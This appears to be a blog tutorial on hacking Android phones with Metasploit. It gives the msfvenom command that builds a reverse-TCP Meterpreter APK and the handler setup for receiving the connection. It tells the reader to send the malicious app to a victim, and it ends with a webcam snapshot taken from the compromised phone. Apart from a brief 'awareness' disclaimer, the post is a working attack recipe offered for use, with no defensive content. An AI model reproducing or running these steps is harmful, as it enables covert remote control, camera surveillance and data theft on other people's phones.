Nowadays, more than thousand of android phones were hacked every month. Hackers were involved in such a crime due to financial, political, and motivations. Thus, been hacked will definitely cause your data to lose. There are plenty of ways to exploit smartphones. But, just for knowledge and social awareness, I will illustrate one example. So, without wasting time let's move toward our tutorial.
Requirement Need:
- OS - You need Linux as an operating system
- 😅😅 And of course, first internet speed
Step: 1
Open your terminal. 😇😑
Write:- msfvenom -p android/meterpreter/reverse_tcp LHOST=(your_ip_address) LPORT = (your_port) R> root/Nepalihacker.apk
Step 2:
To find your ipaddress, open new terminal and write:-
ifconfig
Step: 3
Open another terminal:
- Write msfconsole to open metasploit.
- Now in metasploit terminal write the code.
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST 192.168.100.98 (use your own ipaddress)
- set LPORT 4444
- exploit
Step: 4
So now before exploiting, send the payload / apk file to the victim. Once you send your payload file, exploit it and have patience until you see the sessions start message. Now type 'help' in the terminal. A list of commands will appear on your screen.
Now you have hacked your victim android phone. So for the demo, I have installed a payload app in my device as a victim. So here is my webcam_snap after hacking my own mobile:
0 comments:
Post a Comment